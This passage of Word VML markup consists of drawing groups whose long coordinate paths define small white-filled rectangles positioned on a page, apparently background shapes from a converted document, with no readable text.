672,2533,6672,2531,6672,2530,6672,2529,6672,2528,6672,2526,6672,2525,6672,2524,6672,2522,6672,2521,6672,2520,6672,2518,6672,2517,6672,2515,6672,2513,6672,2512,6672,2510,6672,2508,6672,2507,6672,2505,6672,2503,6672,2501,6672,2499,6672,2497,6672,2495,6672,2493,6672,2491,6672,2489,6672,2487,6672,2485,6672,2482,6672,2480,6672,2478,6672,2475,6672,2473,6672,2471,6672,2468,6672,2465,6672,2463,6672,2460,6672,2457,6672,2455,6672,2452,6672,2449,6672,2446,6672,2443,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6671,2440,6671,2440,6671,2440,6671,2440,6671,2440,6671,2440,6670,2440,6670,2440,6670,2440,6669,2440,6669,2440,6669,2440,6668,2440,6668,2440,6667,2440,6667,2440,6666,2440,6666,2440,6665,2440,6665,2440,6664,2440,6663,2440,6663,2440,6662,2440,6661,2440,6660,2440,6659,2440,6659,2440,6658,2440,6657,2440,6656,2440,6655,2440,6653,2440,6652,2440,6651,2440,6650,2440,6649,2440,6647,2440,6646,2440,6644,2440,6643,2440,6641,2440,6640,2440,6638,2440,6636,2440,6635,2440,6633,2440,6631,2440,6629,2440,6627,2440,6625,2440,6623,2440,6620,2440,6618,2440,6616,2440,6613,2440,6611,2440,6608,2440,6606,2440,6603,2440,6601,2440,6598,2440,6595,2440,6592,2440,6589,2440,6586,2440,6583,2440,6579,2440,6576,2440,6573,2440,6569,2440,6566,2440,6562,2440,6558,2440,6554,2440,6551,2440,6547,2440,6543,2440,6538,2440,6534,2440,6530,2440,6525,2440,6521,2440,6516,2440,6512,2440,6507,2440,6502,2440,6497,2440,6492,2440,6487,2440,6482,2440,6476,2440,6471,2440,6465,2440,6460,2440,6454,2440,6448,2440,6442,2440,6436,2440,6430,2440,6424,2440,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:229.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4590,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:4590;top:6390;width:130;height:270" coordorigin="4590,6390" coordsize="130,270" path="m4601,6417l4601,6417,4601,6417,4601,6417,4601,6417,4601,6417,4601,6417,4601,6417,4601,6417,4601,6417,4601,6417,4601,6417,4601,6417,4601,6417,4601,6417,4602,6417,4602,6417,4602,6417,4602,6417,4602,6417,4602,6417,4602,6417,4602,6417,4602,6417,4602,6417,4602,6417,4602,6417,4603,6417,4603,6417,4603,6417,4603,6417,4603,6417,4603,6417,4604,6417,4604,6417,4604,6417,4604,6417,4605,6417,4605,6417,4605,6417,4606,6417,4606,6417,4606,6417,4607,6417,4607,6417,4607,6417,4608,6417,4608,6417,4609,6417,4609,6417,4610,6417,4610,6417,4611,6417,4611,6417,4612,6417,4613,6417,4613,6417,4614,6417,4615,6417,4615,6417,4616,6417,4617,6417,4617,6417,4618,6417,4619,6417,4620,6417,4621,6417,4622,6417,4623,6417,4624,6417,4625,6417,4626,6417,4627,6417,4628,6417,4629,6417,4630,6417,4631,6417,4633,6417,4634,6417,4635,6417,4636,6417,4638,6417,4639,6417,4641,6417,4642,6417,4644,6417,4645,6417,4647,6417,4648,6417,4650,6417,4652,6417,4653,6417,4655,6417,4657,6417,4659,6417,4660,6417,4662,6417,4664,6417,4666,6417,4668,6417,4670,6417,4673,6417,4675,6417,4677,6417,4679,6417,4681,6417,4684,6417,4686,6417,4689,6417,4691,6417,4694,6417,4696,6417,4699,6417,4701,6417,4704,6417,4707,6417,4710,6417,4713,6417,4715,6417,4718,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6418,4721,6418,4721,6418,4721,6418,4721,6418,4721,6418,4721,6418,4721,6418,4721,6419,4721,6419,4721,6419,4721,6419,4721,6420,4721,6420,4721,6420,4721,6421,4721,6421,4721,6421,4721,6422,4721,6422,4721,6423,4721,6423,4721,6424,4721,6424,4721,6425,4721,6426,4721,6426,4721,6427,4721,6428,4721,6428,4721,6429,4721,6430,4721,6431,4721,6432,4721,6433,4721,6434,4721,6435,4721,6436,4721,6437,4721,6439,4721,6440,4721,6441,4721,6442,4721,6444,4721,6445,4721,6447,4721,6448,4721,6450,4721,6452,4721,6453,4721,6455,4721,6457,4721,6459,4721,6461,4721,6463,4721,6465,4721,6467,4721,6469,4721,6471,4721,6474,4721,6476,4721,6479,4721,6481,4721,6484,4721,6486,4721,6489,4721,6492,4721,6495,4721,6498,4721,6501,4721,6504,4721,6507,4721,6510,4721,6514,4721,6517,4721,6520,4721,6524,4721,6528,4721,6531,4721,6535,4721,6539,4721,6543,4721,6547,4721,6551,4721,6555,4721,6560,4721,6564,4721,6569,4721,6573,4721,6578,4721,6583,4721,6588,4721,6592,4721,6598,4721,6603,4721,6608,4721,6613,4721,6619,4721,6624,4721,6630,4721,6636,4721,6642,4721,6647,4721,6654,4721,6660,4721,6666,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4720,6672,4720,6672,4720,6672,4720,6672,4720,6672,4720,6672,4719,6672,4719,6672,4719,6672,4719,6672,4719,6672,4718,6672,4718,6672,4718,6672,4717,6672,4717,6672,4717,6672,4716,6672,4716,6672,4716,6672,4715,6672,4715,6672,4714,6672,4714,6672,4713,6672,4713,6672,4712,6672,4712,6672,4711,6672,4711,6672,4710,6672,4710,6672,4709,6672,4708,6672,4707,6672,4707,6672,4706,6672,4705,6672,4704,6672,4704,6672,4703,6672,4702,6672,4701,6672,4700,6672,4699,6672,4698,6672,4697,6672,4696,6672,4695,6672,4694,6672,4693,6672,4691,6672,4690,6672,4689,6672,4688,6672,4686,6672,4685,6672,4684,6672,4682,6672,4681,6672,4679,6672,4678,6672,4676,6672,4674,6672,4673,6672,4671,6672,4669,6672,4668,6672,4666,6672,4664,6672,4662,6672,4660,6672,4658,6672,4656,6672,4654,6672,4652,6672,4650,6672,4648,6672,4646,6672,4644,6672,4641,6672,4639,6672,4637,6672,4634,6672,4632,6672,4629,6672,4627,6672,4624,6672,4621,6672,4619,6672,4616,6672,4613,6672,4610,6672,4607,6672,4604,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6672,4601,6671,4601,6671,4601,6671,4601,6671,4601,6671,4601,6671,4601,6670,4601,6670,4601,6670,4601,6669,4601,6669,4601,6669,4601,6668,4601,6668,4601,6667,4601,6667,4601,6666,4601,6666,4601,6665,4601,6665,4601,6664,4601,6663,4601,6663,4601,6662,4601,6661,4601,6660,4601,6659,4601,6659,4601,6658,4601,6657,4601,6656,4601,6655,4601,6653,4601,6652,4601,6651,4601,6650,4601,6649,4601,6647,4601,6646,4601,6644,4601,6643,4601,6641,4601,6640,4601,6638,4601,6636,4601,6635,4601,6633,4601,6631,4601,6629,4601,6627,4601,6625,4601,6623,4601,6620,4601,6618,4601,6616,4601,6613,4601,6611,4601,6608,4601,6606,4601,6603,4601,6601,4601,6598,4601,6595,4601,6592,4601,6589,4601,6586,4601,6583,4601,6579,4601,6576,4601,6573,4601,6569,4601,6566,4601,6562,4601,6558,4601,6554,4601,6551,4601,6547,4601,6543,4601,6538,4601,6534,4601,6530,4601,6525,4601,6521,4601,6516,4601,6512,4601,6507,4601,6502,4601,6497,4601,6492,4601,6487,4601,6482,4601,6476,4601,6471,4601,6465,4601,6460,4601,6454,4601,6448,4601,6442,4601,6436,4601,6430,4601,6424,4601,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:6390;width:130;height:270" coordorigin="4710,6390" coordsize="130,270" path="m4721,6417l4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4721,6417,4722,6417,4722,6417,4722,6417,4722,6417,4722,6417,4722,6417,4722,6417,4722,6417,4722,6417,4722,6417,4722,6417,4722,6417,4722,6417,4722,6417,4723,6417,4723,6417,4723,6417,4723,6417,4723,6417,4723,6417,4724,6417,4724,6417,4724,6417,4724,6417,4725,6417,4725,6417,4725,6417,4726,6417,4726,6417,4726,6417,4727,6417,4727,6417,4727,6417,4728,6417,4728,6417,4729,6417,4729,6417,4730,6417,4730,6417,4731,6417,4731,6417,4732,6417,4733,6417,4733,6417,4734,6417,4735,6417,4735,6417,4736,6417,4737,6417,4738,6417,4738,6417,4739,6417,4740,6417,4741,6417,4742,6417,4743,6417,4744,6417,4745,6417,4746,6417,4747,6417,4748,6417,4749,6417,4750,6417,4751,6417,4753,6417,4754,6417,4755,6417,4757,6417,4758,6417,4759,6417,4761,6417,4762,6417,4764,6417,4765,6417,4767,6417,4768,6417,4770,6417,4772,6417,4773,6417,4775,6417,4777,6417,4779,6417,4781,6417,4782,6417,4784,6417,4786,6417,4788,6417,4791,6417,4793,6417,4795,6417,4797,6417,4799,6417,4802,6417,4804,6417,4806,6417,4809,6417,4811,6417,4814,6417,4816,6417,4819,6417,4821,6417,4824,6417,4827,6417,4830,6417,4833,6417,4835,6417,4838,6417,4841,6417,4841,6417,4841,6417,4841,6417,4841,6417,4841,6417,4841,6417,4841,6417,4841,6417,4841,6417,4841,6417,4841,6417,4841,6417,4841,6417,4841,6418,4841,6418,4841,6418,4841,6418,4841,6418,4841,6418,4841,6418,4841,6418,4841,6419,4841,6419,4841,6419,4841,6419,4841,6420,4841,6420,4841,6420,4841,6421,4841,6421,4841,6421,4841,6422,4841,6422,4841,6423,4841,6423,4841,6424,4841,6424,4841,6425,4841,6426,4841,6426,4841,6427,4841,6428,4841,6428,4841,6429,4841,6430,4841,6431,4841,6432,4841,6433,4841,6434,4841,6435,4841,6436,4841,6437,4841,6439,4841,6440,4841,6441,4841,6442,4841,6444,4841,6445,4841,6447,4841,6448,4841,6450,4841,6452,4841,6453,4841,6455,4841,6457,4841,6459,4841,6461,4841,6463,4841,6465,4841,6467,4841,6469,4841,6471,4841,6474,4841,6476,4841,6479,4841,6481,4841,6484,4841,6486,4841,6489,4841,6492,4841,6495,4841,6498,4841,6501,4841,6504,4841,6507,4841,6510,4841,6514,4841,6517,4841,6520,4841,6524,4841,6528,4841,6531,4841,6535,4841,6539,4841,6543,4841,6547,4841,6551,4841,6555,4841,6560,4841,6564,4841,6569,4841,6573,4841,6578,4841,6583,4841,6588,4841,6592,4841,6598,4841,6603,4841,6608,4841,6613,4841,6619,4841,6624,4841,6630,4841,6636,4841,6642,4841,6647,4841,6654,4841,6660,4841,6666,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4841,6672,4840,6672,4840,6672,4840,6672,4840,6672,4840,6672,4840,6672,4840,6672,4839,6672,4839,6672,4839,6672,4839,6672,4838,6672,4838,6672,4838,6672,4838,6672,4837,6672,4837,6672,4837,6672,4836,6672,4836,6672,4835,6672,4835,6672,4835,6672,4834,6672,4834,6672,4833,6672,4833,6672,4832,6672,4831,6672,4831,6672,4830,6672,4830,6672,4829,6672,4828,6672,4828,6672,4827,6672,4826,6672,4825,6672,4824,6672,4824,6672,4823,6672,4822,6672,4821,6672,4820,6672,4819,6672,4818,6672,4817,6672,4816,6672,4815,6672,4814,6672,4813,6672,4811,6672,4810,6672,4809,6672,4808,6672,4806,6672,4805,6672,4804,6672,4802,6672,4801,6672,4799,6672,4798,6672,4796,6672,4795,6672,4793,6672,4791,6672,4790,6672,4788,6672,4786,6672,4784,6672,4782,6672,4780,6672,4778,6672,4776,6672,4774,6672,4772,6672,4770,6672,4768,6672,4766,6672,4764,6672,4761,6672,4759,6672,4757,6672,4754,6672,4752,6672,4749,6672,4747,6672,4744,6672,4741,6672,4739,6672,4736,6672,4733,6672,4730,6672,4727,6672,4724,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6672,4721,6671,4721,6671,4721,6671,4721,6671,4721,6671,4721,6671,4721,6670,4721,6670,4721,6670,4721,6669,4721,6669,4721,6669,4721,6668,4721,6668,4721,6667,4721,6667,4721,6666,4721,6666,4721,6665,4721,6665,4721,6664,4721,6663,4721,6663,4721,6662,4721,6661,4721,6660,4721,6659,4721,6659,4721,6658,4721,6657,4721,6656,4721,6655,4721,6653,4721,6652,4721,6651,4721,6650,4721,6649,4721,6647,4721,6646,4721,6644,4721,6643,4721,6641,4721,6640,4721,6638,4721,6636,4721,6635,4721,6633,4721,6631,4721,6629,4721,6627,4721,6625,4721,6623,4721,6620,4721,6618,4721,6616,4721,6613,4721,6611,4721,6608,4721,6606,4721,6603,4721,6601,4721,6598,4721,6595,4721,6592,4721,6589,4721,6586,4721,6583,4721,6579,4721,6576,4721,6573,4721,6569,4721,6566,4721,6562,4721,6558,4721,6554,4721,6551,4721,6547,4721,6543,4721,6538,4721,6534,4721,6530,4721,6525,4721,6521,4721,6516,4721,6512,4721,6507,4721,6502,4721,6497,4721,6492,4721,6487,4721,6482,4721,6476,4721,6471,4721,6465,4721,6460,4721,6454,4721,6448,4721,6442,4721,6436,4721,6430,4721,6424,4721,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:349.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6990,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:6990;top:6390;width:130;height:270" coordorigin="6990,6390" coordsize="130,270" path="m7003,6417l7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7003,6417,7004,6417,7004,6417,7004,6417,7004,6417,7004,6417,7004,6417,7004,6417,7005,6417,7005,6417,7005,6417,7005,6417,7006,6417,7006,6417,7006,6417,7006,6417,7007,6417,7007,6417,7007,6417,7008,6417,7008,6417,7009,6417,7009,6417,7009,6417,7010,6417,7010,6417,7011,6417,7011,6417,7012,6417,7013,6417,7013,6417,7014,6417,7014,6417,7015,6417,7016,6417,7016,6417,7017,6417,7018,6417,7019,6417,7020,6417,7020,6417,7021,6417,7022,6417,7023,6417,7024,6417,7025,6417,7026,6417,7027,6417,7028,6417,7029,6417,7030,6417,7031,6417,7033,6417,7034,6417,7035,6417,7036,6417,7038,6417,7039,6417,7040,6417,7042,6417,7043,6417,7045,6417,7046,6417,7048,6417,7049,6417,7051,6417,7053,6417,7054,6417,7056,6417,7058,6417,7060,6417,7062,6417,7064,6417,7066,6417,7068,6417,7070,6417,7072,6417,7074,6417,7076,6417,7078,6417,7080,6417,7083,6417,7085,6417,7087,6417,7090,6417,7092,6417,7095,6417,7097,6417,7100,6417,7103,6417,7105,6417,7108,6417,7111,6417,7114,6417,7117,6417,7120,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6418,7123,6418,7123,6418,7123,6418,7123,6418,7123,6418,7123,6418,7123,6418,7123,6419,7123,6419,7123,6419,7123,6419,7123,6420,7123,6420,7123,6420,7123,6421,7123,6421,7123,6421,7123,6422,7123,6422,7123,6423,7123,6423,7123,6424,7123,6424,7123,6425,7123,6426,7123,6426,7123,6427,7123,6428,7123,6428,7123,6429,7123,6430,7123,6431,7123,6432,7123,6433,7123,6434,7123,6435,7123,6436,7123,6437,7123,6439,7123,6440,7123,6441,7123,6442,7123,6444,7123,6445,7123,6447,7123,6448,7123,6450,7123,6452,7123,6453,7123,6455,7123,6457,7123,6459,7123,6461,7123,6463,7123,6465,7123,6467,7123,6469,7123,6471,7123,6474,7123,6476,7123,6479,7123,6481,7123,6484,7123,6486,7123,6489,7123,6492,7123,6495,7123,6498,7123,6501,7123,6504,7123,6507,7123,6510,7123,6514,7123,6517,7123,6520,7123,6524,7123,6528,7123,6531,7123,6535,7123,6539,7123,6543,7123,6547,7123,6551,7123,6555,7123,6560,7123,6564,7123,6569,7123,6573,7123,6578,7123,6583,7123,6588,7123,6592,7123,6598,7123,6603,7123,6608,7123,6613,7123,6619,7123,6624,7123,6630,7123,6636,7123,6642,7123,6647,7123,6654,7123,6660,7123,6666,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7122,6672,7122,6672,7122,6672,7122,6672,7122,6672,7122,6672,7122,6672,7122,6672,7122,6672,7122,6672,7122,6672,7122,6672,7122,6672,7122,6672,7121,6672,7121,6672,7121,6672,7121,6672,7121,6672,7121,6672,7120,6672,7120,6672,7120,6672,7120,6672,7120,6672,7119,6672,7119,6672,7119,6672,7118,6672,7118,6672,7118,6672,7117,6672,7117,6672,7117,6672,7116,6672,7116,6672,7115,6672,7115,6672,7114,6672,7114,6672,7113,6672,7113,6672,7112,6672,7111,6672,7111,6672,7110,6672,7109,6672,7109,6672,7108,6672,7107,6672,7106,6672,7106,6672,7105,6672,7104,6672,7103,6672,7102,6672,7101,6672,7100,6672,7099,6672,7098,6672,7097,6672,7096,6672,7095,6672,7094,6672,7093,6672,7091,6672,7090,6672,7089,6672,7087,6672,7086,6672,7085,6672,7083,6672,7082,6672,7080,6672,7079,6672,7077,6672,7076,6672,7074,6672,7072,6672,7071,6672,7069,6672,7067,6672,7065,6672,7063,6672,7062,6672,7060,6672,7058,6672,7056,6672,7053,6672,7051,6672,7049,6672,7047,6672,7045,6672,7042,6672,7040,6672,7038,6672,7035,6672,7033,6672,7030,6672,7028,6672,7025,6672,7022,6672,7020,6672,7017,6672,7014,6672,7011,6672,7008,6672,7006,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6672,7003,6671,7003,6671,7003,6671,7003,6671,7003,6671,7003,6671,7003,6670,7003,6670,7003,6670,7003,6669,7003,6669,7003,6669,7003,6668,7003,6668,7003,6667,7003,6667,7003,6666,7003,6666,7003,6665,7003,6665,7003,6664,7003,6663,7003,6663,7003,6662,7003,6661,7003,6660,7003,6659,7003,6659,7003,6658,7003,6657,7003,6656,7003,6655,7003,6653,7003,6652,7003,6651,7003,6650,7003,6649,7003,6647,7003,6646,7003,6644,7003,6643,7003,6641,7003,6640,7003,6638,7003,6636,7003,6635,7003,6633,7003,6631,7003,6629,7003,6627,7003,6625,7003,6623,7003,6620,7003,6618,7003,6616,7003,6613,7003,6611,7003,6608,7003,6606,7003,6603,7003,6601,7003,6598,7003,6595,7003,6592,7003,6589,7003,6586,7003,6583,7003,6579,7003,6576,7003,6573,7003,6569,7003,6566,7003,6562,7003,6558,7003,6554,7003,6551,7003,6547,7003,6543,7003,6538,7003,6534,7003,6530,7003,6525,7003,6521,7003,6516,7003,6512,7003,6507,7003,6502,7003,6497,7003,6492,7003,6487,7003,6482,7003,6476,7003,6471,7003,6465,7003,6460,7003,6454,7003,6448,7003,6442,7003,6436,7003,6430,7003,6424,7003,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:355.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7110,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:7110;top:6390;width:130;height:270" coordorigin="7110,6390" coordsize="130,270" path="m7123,6417l7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7123,6417,7124,6417,7124,6417,7124,6417,7124,6417,7124,6417,7124,6417,7125,6417,7125,6417,7125,6417,7125,6417,7125,6417,7126,6417,7126,6417,7126,6417,7126,6417,7127,6417,7127,6417,7127,6417,7128,6417,7128,6417,7129,6417,7129,6417,7130,6417,7130,6417,7130,6417,7131,6417,7131,6417,7132,6417,7133,6417,7133,6417,7134,6417,7134,6417,7135,6417,7136,6417,7136,6417,7137,6417,7138,6417,7139,6417,7140,6417,7140,6417,7141,6417,7142,6417,7143,6417,7144,6417,7145,6417,7146,6417,7147,6417,7148,6417,7149,6417,7150,6417,7151,6417,7153,6417,7154,6417,7155,6417,7156,6417,7158,6417,7159,6417,7160,6417,7162,6417,7163,6417,7165,6417,7166,6417,7168,6417,7170,6417,7171,6417,7173,6417,7175,6417,7176,6417,7178,6417,7180,6417,7182,6417,7184,6417,7186,6417,7188,6417,7190,6417,7192,6417,7194,6417,7196,6417,7198,6417,7200,6417,7203,6417,7205,6417,7207,6417,7210,6417,7212,6417,7215,6417,7217,6417,7220,6417,7223,6417,7225,6417,7228,6417,7231,6417,7234,6417,7237,6417,7240,6417,7243,6417,7243,6417,7243,6417,7243,6417,7243,6417,7243,6417,7243,6417,7243,6417,7243,6417,7243,6417,7243,6417,7243,6417,7243,6417,7243,6417,7243,6418,7243,6418,7243,6418,7243,6418,7243,6418,7243,6418,7243,6418,7243,6418,7243,6419,7243,6419,7243,6419,7243,6419,7243,6420,7243,6420,7243,6420,7243,6421,7243,6421,7243,6421,7243,6422,7243,6422,7243,6423,7243,6423,7243,6424,7243,6424,7243,6425,7243,6426,7243,6426,7243,6427,7243,6428,7243,6428,7243,6429,7243,6430,7243,6431,7243,6432,7243,6433,7243,6434,7243,6435,7243,6436,7243,6437,7243,6439,7243,6440,7243,6441,7243,6442,7243,6444,7243,6445,7243,6447,7243,6448,7243,6450,7243,6452,7243,6453,7243,6455,7243,6457,7243,6459,7243,6461,7243,6463,7243,6465,7243,6467,7243,6469,7243,6471,7243,6474,7243,6476,7243,6479,7243,6481,7243,6484,7243,6486,7243,6489,7243,6492,7243,6495,7243,6498,7243,6501,7243,6504,7243,6507,7243,6510,7243,6514,7243,6517,7243,6520,7243,6524,7243,6528,7243,6531,7243,6535,7243,6539,7243,6543,7243,6547,7243,6551,7243,6555,7243,6560,7243,6564,7243,6569,7243,6573,7243,6578,7243,6583,7243,6588,7243,6592,7243,6598,7243,6603,7243,6608,7243,6613,7243,6619,7243,6624,7243,6630,7243,6636,7243,6642,7243,6647,7243,6654,7243,6660,7243,6666,7243,6672,7243,6672,7243,6672,7243,6672,7243,6672,7243,6672,7243,6672,7243,6672,7243,6672,7243,6672,7243,6672,7243,6672,7243,6672,7243,6672,7242,6672,7242,6672,7242,6672,7242,6672,7242,6672,7242,6672,7242,6672,7242,6672,7242,6672,7242,6672,7242,6672,7242,6672,7242,6672,7241,6672,7241,6672,7241,6672,7241,6672,7241,6672,7241,6672,7240,6672,7240,6672,7240,6672,7240,6672,7239,6672,7239,6672,7239,6672,7238,6672,7238,6672,7238,6672,7237,6672,7237,6672,7237,6672,7236,6672,7236,6672,7235,6672,7235,6672,7234,6672,7234,6672,7233,6672,7233,6672,7232,6672,7231,6672,7231,6672,7230,6672,7229,6672,7229,6672,7228,6672,7227,6672,7226,6672,7226,6672,7225,6672,7224,6672,7223,6672,7222,6672,7221,6672,7220,6672,7219,6672,7218,6672,7217,6672,7216,6672,7215,6672,7214,6672,7213,6672,7211,6672,7210,6672,7209,6672,7208,6672,7206,6672,7205,6672,7203,6672,7202,6672,7200,6672,7199,6672,7197,6672,7196,6672,7194,6672,7192,6672,7191,6672,7189,6672,7187,6672,7185,6672,7183,6672,7182,6672,7180,6672,7178,6672,7176,6672,7174,6672,7171,6672,7169,6672,7167,6672,7165,6672,7163,6672,7160,6672,7158,6672,7155,6672,7153,6672,7150,6672,7148,6672,7145,6672,7143,6672,7140,6672,7137,6672,7134,6672,7131,6672,7129,6672,7126,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6672,7123,6671,7123,6671,7123,6671,7123,6671,7123,6671,7123,6671,7123,6670,7123,6670,7123,6670,7123,6669,7123,6669,7123,6669,7123,6668,7123,6668,7123,6667,7123,6667,7123,6666,7123,6666,7123,6665,7123,6665,7123,6664,7123,6663,7123,6663,7123,6662,7123,6661,7123,6660,7123,6659,7123,6659,7123,6658,7123,6657,7123,6656,7123,6655,7123,6653,7123,6652,7123,6651,7123,6650,7123,6649,7123,6647,7123,6646,7123,6644,7123,6643,7123,6641,7123,6640,7123,6638,7123,6636,7123,6635,7123,6633,7123,6631,7123,6629,7123,6627,7123,6625,7123,6623,7123,6620,7123,6618,7123,6616,7123,6613,7123,6611,7123,6608,7123,6606,7123,6603,7123,6601,7123,6598,7123,6595,7123,6592,7123,6589,7123,6586,7123,6583,7123,6579,7123,6576,7123,6573,7123,6569,7123,6566,7123,6562,7123,6558,7123,6554,7123,6551,7123,6547,7123,6543,7123,6538,7123,6534,7123,6530,7123,6525,7123,6521,7123,6516,7123,6512,7123,6507,7123,6502,7123,6497,7123,6492,7123,6487,7123,6482,7123,6476,7123,6471,7123,6465,7123,6460,7123,6454,7123,6448,7123,6442,7123,6436,7123,6430,7123,6424,7123,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:127.500pt;margin-top:333.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2550,6670" coordsize="130,270">
        <v:shape style="position:absolute;left:2550;top:6670;width:130;height:270" coordorigin="2550,6670" coordsize="130,270" path="m2560,6687l2560,6687,2560,6687,2560,6687,2560,6687,2560,6687,2560,6687,2560,6687,2560,6687,2560,6687,2560,6687,2560,6687,2560,6687,2560,6687,2560,6687,2560,6687,2561,6687,2561,6687,2561,6687,2561,6687,2561,6687,2561,6687,2561,6687,2561,6687,2561,6687,2561,6687,2561,6687,2562,6687,2562,6687,2562,6687,2562,6687,2562,6687,2562,6687,2563,6687,2563,6687,2563,6687,2563,6687,2564,6687,2564,6687,2564,6687,2565,6687,2565,6687,2565,6687,2566,6687,2566,6687,2566,6687,2567,6687,2567,6687,2568,6687,2568,6687,2569,6687,2569,6687,2570,6687,2570,6687,2571,6687,2572,6687,2572,6687,2573,6687,2573,6687,2574,6687,2575,6687,2576,6687,2576,6687,2577,6687,2578,6687,2579,6687,2580,6687,2581,6687,2582,6687,2583,6687,2584,6687,2585,6687,2586,6687,2587,6687,2588,6687,2589,6687,2590,6687,2592,6687,2593,6687,2594,6687,2595,6687,2597,6687,2598,6687,2600,6687,2601,6687,2603,6687,2604,6687,2606,6687,2607,6687,2609,6687,2611,6687,2612,6687,2614,6687,2616,6687,2618,6687,2619,6687,2621,6687,2623,6687,2625,6687,2627,6687,2629,6687,2632,6687,2634,6687,2636,6687,2638,6687,2640,6687,2643,6687,2645,6687,2648,6687,2650,6687,2653,6687,2655,6687,2658,6687,2660,6687,2663,6687,2666,6687,2669,6687,2671,6687,2674,6687,2677,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6687,2680,6688,2680,6688,2680,6688,2680,6688,2680,6688,2680,6688,2680,6688,2680,6688,2680,6688,2680,6688,2680,6689,2680,6689,2680,6689,2680,6689,2680,6689,2680,6690,2680,6690,2680,6690,2680,6691,2680,6691,2680,6691,2680,6692,2680,6692,2680,6693,2680,6693,2680,6694,2680,6694,2680,6695,2680,6696,2680,6696,2680,6697,2680,6698,2680,6699,2680,6699,2680,6700,2680,6701,2680,6702,2680,6703,2680,6704,2680,6705,2680,6706,2680,6707,2680,6709,2680,6710,2680,6711,2680,6713,2680,6714,2680,6715,2680,6717,2680,6718,2680,6720,2680,6722,2680,6723,2680,6725,2680,6727,2680,6729,2680,6731,2680,6733,2680,6735,2680,6737,2680,6739,2680,6742,2680,6744,2680,6746,2680,6749,2680,6751,2680,6754,2680,6756,2680,6759,2680,6762,2680,6765,2680,6768,2680,6771,2680,6774,2680,6777,2680,6780,2680,6784,2680,6787,2680,6791,2680,6794,2680,6798,2680,6801,2680,6805,2680,6809,2680